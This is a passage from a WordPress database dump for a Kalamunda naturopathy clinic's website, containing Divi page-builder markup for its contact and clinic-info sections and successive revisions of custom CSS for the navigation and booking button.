locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2021-05-27 21:33:46','2021-05-27 13:33:46','',188,'https://verdenaturopathy.com.au/?p=267',0,'revision','',0),(268,1,'2021-05-27 21:33:48','2021-05-27 13:33:48','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; \">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span>\n<span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span>\n\n<span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n<span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n [/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-05-27 21:33:48','2021-05-27 13:33:48','',26,'https://verdenaturopathy.com.au/?p=268',0,'revision','',0),(273,1,'2021-05-30 19:04:02','2021-05-30 11:04:02','@media screen and (min-width: 1040px) {\n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n \n }\n}\n@media screen and (max-width: 768px) {\n #booking_button {\n padding: 10px;\n font-size: 10px;\n }\n \n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:04:02','2021-05-30 11:04:02','',84,'https://verdenaturopathy.com.au/?p=273',0,'revision','',0),(277,1,'2021-05-30 19:08:23','2021-05-30 11:08:23','\n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 768px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n }\n \n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:08:23','2021-05-30 11:08:23','',84,'https://verdenaturopathy.com.au/?p=277',0,'revision','',0),(275,1,'2021-05-30 19:06:31','2021-05-30 11:06:31','@media screen and (min-width: 1040px) {\n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n \n }\n}\n@media screen and (max-width: 768px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n }\n \n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:06:31','2021-05-30 11:06:31','',84,'https://verdenaturopathy.com.au/?p=275',0,'revision','',0),(279,1,'2021-05-30 19:09:27','2021-05-30 11:09:27','\n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 768px) {\n booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n }\n \n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:09:27','2021-05-30 11:09:27','',84,'https://verdenaturopathy.com.au/?p=279',0,'revision','',0),(281,1,'2021-05-30 19:10:19','2021-05-30 11:10:19','\n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 768px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n }\n \n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:10:19','2021-05-30 11:10:19','',84,'https://verdenaturopathy.com.au/?p=281',0,'revision','',0),(283,1,'2021-05-30 19:11:20','2021-05-30 11:11:20','\n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 980px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n }\n \n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:11:20','2021-05-30 11:11:20','',84,'https://verdenaturopathy.com.au/?p=283',0,'revision','',0),(285,1,'2021-05-30 19:11:59','2021-05-30 11:11:59','\n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 980px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n float: none;\n }\n \n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:11:59','2021-05-30 11:11:59','',84,'https://verdenaturopathy.com.au/?p=285',0,'revision','',0),(287,1,'2021-05-30 19:17:44','2021-05-30 11:17:44','\n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 980px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n display:none;\n }\n \n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:17:44','2021-05-30 11:17:44','',84,'https://verdenaturopathy.com.au/?p=287',0,'revision','',0),(289,1,'2021-05-30 19:18:19','2021-05-30 11:18:19','\n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 980px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n display:none!important;\n }\n \n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:18:19','2021-05-30 11:18:19','',84,'https://verdenaturopathy.com.au/?p=289',0,'revision','',0),(291,1,'2021-05-30 19:20:01','2021-05-30 11:20:01','/* \n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 980px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n display:none!important;\n }\n \n} */','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:20:01','2021-05-30 11:20:01','',84,'https://verdenaturopathy.com.au/?p=291',0,'revision','',0),(292,1,'2025-04-01 19:58:59','2021-05-30 11:20:52','','Make a booking','','publish','closed','closed','','make-a-booking','','','2025-04-01 19:58:59','2025-04-01 11:58:59','',0,'https://verdenaturopathy.com.au/?p=292',5,'nav_menu_item','',0),(300,1,'2021-05-30 19:38:59','2021-05-30 11:38:59','\n\n.menu_cta {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:38:59','2021-05-30 11:38:59','',84,'https://verdenaturopathy.com.au/?p=300',0,'revision','',0),(298,1,'2021-05-30 19:34:46','2021-05-30 11:34:46','/* \n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 980px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n display:none!important;\n }\n \n} */\n\n.menu_cta > a {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:34:46','2021-05-30 11:34:46','',84,'https://verdenaturopathy.com.au/?p=298',0,'revision','',0),(296,1,'2021-05-30 19:27:35','2021-05-30 11:27:35','/* \n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 980px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n display:none!important;\n }\n \n} */\n\n.menu_cta {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n cursor:pointer;\n color:#000000;\n\n\n\n text-decoration:none;\n text-shadow:0px 1px 0px #2f6627;\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:27:35','2021-05-30 11:27:35','',84,'https://verdenaturopathy.com.au/?p=296',0,'revision','',0),(294,1,'2021-05-30 19:26:03','2021-05-30 11:26:03','/* \n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n}\n \n@media screen and (max-width: 980px) {\n #booking_button {\n padding: 5px!important;\n font-size: 10px!important;\n display:none!important;\n }\n \n} */\n\n#menu_cta {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n display:inline-block;\n cursor:pointer;\n color:#000000;\n font-family:Montserrat;\n font-size:15px;\n padding:16px 31px;\n text-decoration:none;\n text-shadow:0px 1px 0px #2f6627;\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:26:03','2021-05-30 11:26:03','',84,'https://verdenaturopathy.com.au/?p=294',0,'revision','',0),(302,1,'2021-05-30 19:39:24','2021-05-30 11:39:24','\n\n.menu_cta {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n padding: 0!important;\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:39:24','2021-05-30 11:39:24','',84,'https://verdenaturopathy.com.au/?p=302',0,'revision','',0),(304,1,'2021-05-30 19:43:38','2021-05-30 11:43:38','\n\n.menu_cta a {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n padding: 12px!important;\n}\n\n.et_header_style_left #et-top-navigation {\n padding-top: 16px!important;\n}\n \n.et_header_style_left .et-fixed-header #et-top-navigation {\n padding-top: 6px!important;\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:43:38','2021-05-30 11:43:38','',84,'https://verdenaturopathy.com.au/?p=304',0,'revision','',0),(306,1,'2021-05-30 19:44:16','2021-05-30 11:44:16','\n\n.menu_cta a {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n padding: 12px!important;\n color: #000000\n}\n\n.et_header_style_left #et-top-navigation {\n padding-top: 16px!important;\n}\n \n.et_header_style_left .et-fixed-header #et-top-navigation {\n padding-top: 6px!important;\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:44:16','2021-05-30 11:44:16','',84,'https://verdenaturopathy.com.au/?p=306',0,'revision','',0),(376,1,'2022-01-21 12:23:03','2022-01-21 04:23:03','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 8.15am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2022-01-21 12:23:03','2022-01-21 04:23:03','',188,'https://verdenaturopathy.com.au/?p=376',0,'revision','',0),(360,1,'2021-09-14 10:34:46','2021-09-14 02:34:46','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" 